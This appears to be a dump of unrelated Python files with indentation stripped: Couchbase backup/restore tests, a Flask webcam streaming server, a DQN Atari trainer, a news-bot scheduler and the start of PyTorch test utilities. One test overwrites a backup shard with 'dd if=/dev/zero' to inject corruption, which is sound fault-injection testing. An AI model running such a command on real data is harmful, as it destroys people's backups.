command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
self.backupset.start = 1
self.backupset.end = len(self.backups)
self.backup_merge_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [],
[])
rebalance.result()
start = self.number_of_backups_taken
end = self.number_of_backups_taken
self.backupset.start = start
self.backupset.end = end
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=">=")
cmd = "cbindex -type list"
remote_client = RemoteMachineShellConnection(
self.backupset.restore_cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if len(output) > 1:
self.assertTrue("Index:default/Num1" in output[1],
"GSI index not created in restore cluster as expected")
self.log.info("GSI index created in restore cluster as expected")
else:
self.fail("GSI index not created in restore cluster as expected")
def test_backup_restore_with_fts(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a simple FTS index on source cluster
4. Backs up data and validates
5. Restores data and validates
6. Ensures that same FTS index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'fts'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100), start=0,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
rest_src_fts = RestConnection(self.servers[1])
try:
from pytests.fts.fts_callable import FTSCallable
fts_obj = FTSCallable(nodes=self.servers, es_validate=False)
index = fts_obj.create_default_index(
index_name="index_default",
bucket_name="default")
fts_obj.wait_for_indexing_complete()
alias = fts_obj.create_alias(target_indexes=[index])
except Exception, ex:
self.fail(ex)
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'fts'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
rest_target_fts = RestConnection(self.input.clusters[0][1])
status = False
try:
status, content = rest_target_fts.get_fts_index_definition(index.name)
self.assertTrue(status and content['status'] == 'ok',
"FTS index not found in restore cluster as expected")
self.log.info("FTS index found in restore cluster as expected")
status, content = rest_target_fts.get_fts_index_definition(alias.name)
self.assertTrue(status and content['status'] == 'ok',
"FTS alias not found in restore cluster as expected")
self.log.info("FTS alias found in restore cluster as expected")
finally:
rest_src_fts.delete_fts_index(index.name)
rest_src_fts.delete_fts_index(alias.name)
if status:
rest_target_fts.delete_fts_index(index.name)
rest_target_fts.delete_fts_index(alias.name)
def test_backup_restore_with_xdcr(self):
"""
1. Creates an XDCR replication between the first two servers
2. Creates specified bucket on the cluster and loads it with given number of items
3. Backs up data and validates while replication is going on
4. Restores data and validates while replication is going on
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_dest = RestConnection(self.servers[1])
try:
rest_src.remove_all_replications()
rest_src.remove_all_remote_clusters()
rest_src.add_remote_cluster(self.servers[1].ip, self.servers[1].port, self.backupset.cluster_host_username,
self.backupset.cluster_host_password, "C2")
rest_dest.create_bucket(bucket='default', ramQuotaMB=512)
self.sleep(10)
repl_id = rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
tasks = self._async_load_all_buckets(self.master, gen, "create", 0)
self.sleep(10)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
for task in tasks:
task.result()
finally:
rest_dest.delete_bucket()
def test_backup_restore_with_warmup(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Warms up the cluster host
3. Backs up data and validates while warmup is on
4. Restores data and validates while warmup is on
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
NodeHelper.do_a_warm_up(self.backupset.cluster_host)
self.sleep(30)
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
""" only membase bucket has warmup state """
if self.bucket_type == Bucket.Type.MEMBASE:
NodeHelper.wait_warmup_completed([self.backupset.cluster_host])
def stat(self, key):
stats = StatsCommon.get_stats([self.master], 'default', "", key)
val = stats.values()[0]
if val.isdigit():
val = int(val)
return val
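# stat() example: self.stat('curr_items') returns the 'curr_items' stat of the
# default bucket on self.master, converted to int when the value is numeric
# (load_to_dgm below relies on this helper).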
def load_to_dgm(self, active=75, ttl=0):
"""
loads items until the active resident ratio drops to at most active%,
putting the bucket into DGM; active is an integer value between 0 and 100
"""
doc_size = 1024
curr_active = self.stat('vb_active_perc_mem_resident')
# go into heavy dgm
while curr_active > active:
curr_items = self.stat('curr_items')
gen_create = BlobGenerator('dgmkv', 'dgmkv-', doc_size, start=curr_items + 1, end=curr_items + 50000)
try:
self._load_all_buckets(self.master, gen_create, "create", ttl)
except:
pass
curr_active = self.stat('vb_active_perc_mem_resident')
def test_backup_restore_with_dgm(self):
"""
1. Creates specified bucket on the cluster and loads it until dgm
2. Creates a backup set
3. Backs up data and validates
4. Restores data and validates
"""
self.load_to_dgm()
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_auto_compaction(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates auto compaction settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.set_auto_compaction(dbFragmentThresholdPercentage=80,
dbFragmentThreshold=100,
viewFragmntThresholdPercentage=80,
viewFragmntThreshold=100,
bucket="default")
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_update_notifications(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates notification settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.update_notifications("true")
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_alerts(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates alerts settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.set_alerts_settings('couchbase@localhost', 'root@localhost', 'user', 'pwd')
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_merge_with_crash(self):
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=5)
try:
merge_result = self.cluster.async_merge_cluster(backup_host=self.backupset.backup_host,
backups=self.backups,
start=1, end=5,
directory=self.backupset.directory,
name=self.backupset.name,
cli_command_location=self.cli_command_location)
self.sleep(10)
self._kill_cbbackupmgr()
merge_result.result(timeout=400)
except TimeoutError:
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
for line in output:
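# backup names are timestamps matched by the regex below,
# e.g. (illustrative, constructed to match the pattern) 2016-08-19T17_11_18.572640763-07_00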
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(self.backups), "Number of backups after merge crash did not match")
self.log.info("Number of backups after merge crash matched")
def test_compact_with_crash(self):
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
status, output_before_compact, message = self.backup_list()
if not status:
self.fail(message)
try:
compact_result = self.cluster.async_compact_cluster(backup_host=self.backupset.backup_host,
backups=self.backups,
backup_to_compact=self.backupset.backup_to_compact,
directory=self.backupset.directory,
name=self.backupset.name,
cli_command_location=self.cli_command_location)
self.sleep(10)
self._kill_cbbackupmgr()
compact_result.result(timeout=400)
except TimeoutError:
status, output_after_compact, message = self.backup_list()
if not status:
self.fail(message)
status, message = self.validation_helper.validate_compact_lists(output_before_compact,
output_after_compact,
is_approx=True)
if not status:
self.fail(message)
self.log.info(message)
def test_backup_restore_misc(self):
"""
Misc scenarios for backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backupset.name = "!@#$%^&"
output, error = self.backup_create()
self.assertTrue("Backup `!@#$%^` created successfully" in output[0],
"Backup could not be created with special characters")
self.log.info("Backup created with special characters")
self.backupset.name = "backup"
self.backup_create()
self.backup_cluster()
conn = RemoteMachineShellConnection(self.backupset.backup_host)
command = "ls -tr {0}/{1}/{2} | tail".format(self.backupset.directory, self.backupset.name, self.backups[0])
o, e = conn.execute_command(command)
data_dir = o[0]
conn.execute_command("dd if=/dev/zero of=/tmp/entbackup/backup/" +
str(self.backups[0]) +
"/" + data_dir + "/data/shard_0.fdb" +
" bs=1024 count=100 seek=10 conv=notrunc")
output, error = self.backup_restore()
self.assertTrue("Restore failed due to an internal issue, see logs for details" in output[-1],
"Expected error not thrown when file is corrupt")
self.log.info("Expected error thrown when file is corrupted")
conn.execute_command("mv /tmp/entbackup/backup /tmp/entbackup/backup2")
conn.disconnect()
output, error = self.backup_restore()
self.assertTrue("Backup Repository `backup` not found" in output[-1], "Expected error message not thrown")
self.log.info("Expected error message thrown")
""" cbbackup restore enhancement only from vulcan """
def test_cbbackupmgr_collect_logs(self):
"""
cbbackupmgr collect-logs collects logs into the archive, or writes
them to any path supplied with the -o flag
CB_ARCHIVE_PATH
ex: cbbackupmgr collect-logs -a /tmp/backup
cbbackupmgr collect-logs -a /tmp/backup -o /tmp/logs
"""
if "5.5" > self.cb_version[:3]:
self.fail("This test is only for cb version 5.5 and later. ")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._collect_logs()
def test_cbbackupmgr_restore_with_ttl(self):
"""
cbbackupmgr restore --replace-ttl replaces document TTL values
with the value given by the --replace-ttl-with flag
ex: cbbackupmgr restore --replace-ttl all --replace-ttl-with 0
"""
if "5.5" > self.cb_version[:3]:
self.fail("This restore with ttl test is only for cb version 5.5 and later. ")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
if self.replace_ttl == "expired":
if self.bk_with_ttl:
self._load_all_buckets(self.master, gen, "create", int(self.bk_with_ttl))
else:
self._load_all_buckets(self.master, gen, "create", 0)
else:
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
if self.bk_with_ttl:
self.sleep(int(self.bk_with_ttl) + 10, "wait items to be expired in backup")
compare_function = "=="
if self.replace_ttl_with:
compare_function = "<="
if self.should_fail:
self.backup_restore()
else:
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=compare_function)
def test_cbbackupmgr_restore_with_vbuckets_filter(self):
"""
cbbackupmgr restore --vbuckets-filter 2,3,4,5,6
this test may require a minimum of 2 server nodes to run
"""
if "5.5" > self.cb_version[:3]:
self.fail("This test is only for cb version 5.5 and later. ")
self.num_items = 1000
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
if self.should_fail:
self.backup_restore()
else:
self.backup_restore_validate()
def test_cbbackupmgr_with_eventing(self):
"""
Create backup cluster with saslbucket (default_bucket=False).
Create events
Backup cluster
Create restore cluster
Restore data back to restore cluster
Verify events restored back
"""
if "5.5" > self.cb_version[:3]:
self.fail("This eventing test is only for cb version 5.5 and later. ")
from pytests.eventing.eventing_constants import HANDLER_CODE
from lib.testconstants import STANDARD_BUCKET_PORT
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.create_functions_buckets = self.input.param('create_functions_buckets', True)
self.docs_per_day = self.input.param("doc-per-day", 1)
self.use_memory_manager = self.input.param('use_memory_manager', True)
bucket_params = self._create_bucket_params(server=self.master, size=128,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.src_bucket = RestConnection(self.master).get_buckets()
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.gens_load = self.generate_docs(self.docs_per_day)
self.expiry = 3
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.load(self.gens_load, buckets=self.buckets, flag=self.item_flag, verify_data=False,
batch_size=self.batch_size)
function_name = "Function_{0}_{1}".format(randint(1, 1000000000), self._testMethodName)
self.function_name = function_name[0:90]
body = self.create_save_function_body(self.function_name, HANDLER_CODE.BUCKET_OPS_ON_UPDATE, worker_count=3)
bk_events_created = False
rs_events_created = False
try:
self.deploy_function(body)
bk_events_created = True
self.backup_create()
self.backup_cluster()
rest_src = RestConnection(self.backupset.cluster_host)
bk_fxn = rest_src.get_all_functions()
if bk_fxn != "":
self._verify_backup_events_definition(json.loads(bk_fxn))
self.backup_restore()
self.rest = RestConnection(self.backupset.restore_cluster_host)
self.wait_for_bootstrap_to_complete(body['appname'])
rs_events_created = True
self._verify_restore_events_definition(bk_fxn)
except Exception as e:
self.fail(e)
finally:
master_nodes = [self.backupset.cluster_host,
self.backupset.restore_cluster_host]
for node in master_nodes:
self.rest = RestConnection(node)
buckets = self.rest.get_buckets()
for bucket in buckets:
items = self.rest.get_active_key_count(bucket)
self.undeploy_and_delete_function(body)
self.rest = RestConnection(self.master)
|
stream_server.py
|
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import threading
import argparse
import datetime
import imutils
import time
import cv2
# most recent frame grabbed from the camera, shared between threads
outputFrame = None
# protects outputFrame so a frame is never encoded while it is being replaced
lock = threading.Lock()
app = Flask(__name__)
# start the camera stream (src=0 selects the default webcam) and give it time to warm up
vs = VideoStream(resolution=(240, 180), src=0).start()
time.sleep(2.0)
@app.route("/")
def index():
return render_template("index.html")
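# Assumption: templates/index.html (not shown in this file) embeds the stream,
# e.g. via <img src="{{ url_for('video_feed') }}">.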
def get_frame(frameCount):
global vs, outputFrame, lock
total = 0
while True:
frame = vs.read()
#frame = imutils.resize(frame, width=320)
total += 1
with lock:
outputFrame = frame.copy()
def generate():
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
if not flag:
continue
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
@app.route('/video_feed')
def video_feed():
return Response(generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
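# multipart/x-mixed-replace keeps the HTTP response open; each JPEG yielded by
# generate() replaces the previous one in the browser, producing a live MJPEG stream.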
if __name__ == '__main__':
t = threading.Thread(target=get_frame, args=(32,))
t.daemon = True
t.start()
app.run(host="0.0.0.0", port=33333, threaded=True, use_reloader=False)
vs.stop()
|
run_dqn_atari_log.py
|
import argparse
import gym
from gym import wrappers
import os.path as osp
import os
import time
import random
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from multiprocessing import Process
import dqn_log as dqn
from dqn_utils import *
from atari_wrappers import *
def atari_model(img_in, num_actions, scope, reuse=False):
# as described in https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
# original architecture
out = layers.convolution2d(out, num_outputs=32, kernel_size=8, stride=4, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=4, stride=2, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=3, stride=1, activation_fn=tf.nn.relu)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
out = layers.fully_connected(out, num_outputs=512, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return out
def atari_learn(exp_name,
task,
seed,
logdir,
checkpoint_dir,
num_timesteps,
target_update_freq):
# get environment
env = get_env(task, seed)
session = get_session()
# This is just a rough estimate
num_iterations = float(num_timesteps) / 4.0
lr_multiplier = 1.0
lr_schedule = PiecewiseSchedule([
(0, 1e-4 * lr_multiplier),
(num_iterations / 10, 1e-4 * lr_multiplier),
(num_iterations / 2, 5e-5 * lr_multiplier),
],
outside_value=5e-5 * lr_multiplier)
optimizer = dqn.OptimizerSpec(
constructor=tf.train.AdamOptimizer,
kwargs=dict(epsilon=1e-4),
lr_schedule=lr_schedule
)
def stopping_criterion(env, t):
# notice that here t is the number of steps of the wrapped env,
# which is different from the number of steps in the underlying env
return get_wrapper_by_name(env, "Monitor").get_total_steps() >= num_timesteps
exploration_schedule = PiecewiseSchedule(
[
(0, 1.0),
(1e6, 0.1),
(10e6/2, 0.01),
], outside_value=0.01
)
dqn.learn(
exp_name,
env,
q_func=atari_model,
optimizer_spec=optimizer,
session=session,
logdir = logdir,
checkpoint_dir = checkpoint_dir,
exploration=exploration_schedule,
stopping_criterion=stopping_criterion,
replay_buffer_size=1000000,
batch_size=32,
gamma=0.99,
learning_starts=50000,
learning_freq=4,
frame_history_len=4,
target_update_freq=target_update_freq,
grad_norm_clipping=10
)
env.close()
def get_available_gpus():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.physical_device_desc for x in local_device_protos if x.device_type == 'GPU']
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
def get_session():
tf.reset_default_graph()
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=1,
intra_op_parallelism_threads=1)
session = tf.Session(config=tf_config)
print("AVAILABLE GPUS: ", get_available_gpus())
return session
def get_env(task, seed):
env_id = task.env_id
env = gym.make(env_id)
set_global_seeds(seed)
env.seed(seed)
expt_dir = '/tmp/hw3_vid_dir2/'
env = wrappers.Monitor(env, osp.join(expt_dir, "gym"), force=True)
env = wrap_deepmind(env)
return env
def main(args):
# Get Atari games.
benchmark = gym.benchmark_spec('Atari40M')
# Change the index to select a different game.
task = benchmark.tasks[3]
env_name = task.env_id
# create the logs directory
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
# Run training
num_timesteps = args.num_timesteps or task.max_timesteps
def train_func():
atari_learn(args.exp_name,
task,
seed,
logdir=os.path.join(logdir,'%d'%seed),
checkpoint_dir=args.checkpoint_dir ,
num_timesteps=num_timesteps,
target_update_freq=args.target_update_freq)
p = Process(target=train_func, args=tuple())
p.start()
p.join()
def get_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument(
"--target_update_freq",
type=int,
default=10000,
help="How often to copy current network to target network",
)
parser.add_argument(
"--num_timesteps",
type=int,
default=16000000,
help="Maximum number of timesteps to run",
)
parser.add_argument(
"--replay_buffer_size",
type=int,
default=1000000,
help="Size of the replay buffer",
)
parser.add_argument(
"--checkpoint_dir",
type=str,
default='./checkpoints',
help="Directory to checkpoint NN",
)
return parser
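# Hypothetical invocation (assumes dqn_log, dqn_utils and atari_wrappers are on PYTHONPATH):
#   python run_dqn_atari_log.py --exp_name dqn_atari --seed 1 \
#       --num_timesteps 16000000 --target_update_freq 10000 \
#       --checkpoint_dir ./checkpoints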
if __name__ == "__main__":
main(get_arg_parser().parse_args())
|
main.py
|
import threading
from time import sleep
import schedule
from newsweec.meta.logger import logging # noreorder
from newsweec.meta.logger import Logger # noreorder
from newsweec.bot.bot import get_user_from_user_handler
from newsweec.bot.bot import poll
from newsweec.news.news_collector import collect_news
DEBUG = logging.DEBUG
m_l = logging.getLogger("main")
main_logger = Logger(m_l, DEBUG, filename="")
def start_bot():
def _pol():
main_logger.log(logging.INFO, "Starting bot")
poll()
def _sched():
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
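# `schedule` runs jobs synchronously in the thread that calls run_pending();
# wrapping each job in its own Thread keeps a slow job (e.g. collect_news)
# from blocking the scheduler loop.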
main_logger.log(logging.DEBUG, message="Starting scheduler")
schedule.every(0.5).seconds.do(
run_threaded, get_user_from_user_handler)
# schedule.every(20).seconds.do(run_threaded, clean_q)
# schedule.every().day.at("01:00").do(run_threaded, todays_tasks)
schedule.every(1).hour.do(run_threaded, collect_news)
# get_q_users()
pol_t = threading.Thread(target=_pol, daemon=True)
sched = threading.Thread(target=_sched, daemon=True)
pol_t.start()
sched.start()
# pol_t.join()
# sched.join()
# keep the main thread alive 😁 so that Ctrl + C can be used to stop the execution
while True:
try:
schedule.run_pending()
sleep(1)
except KeyboardInterrupt:
quit()
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is addressed
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following snippet is copied from the Py3 core library subprocess.call,
# with two changes:
# 1. an `except KeyboardInterrupt` block is added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
#    `p.wait()` in a `finally` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
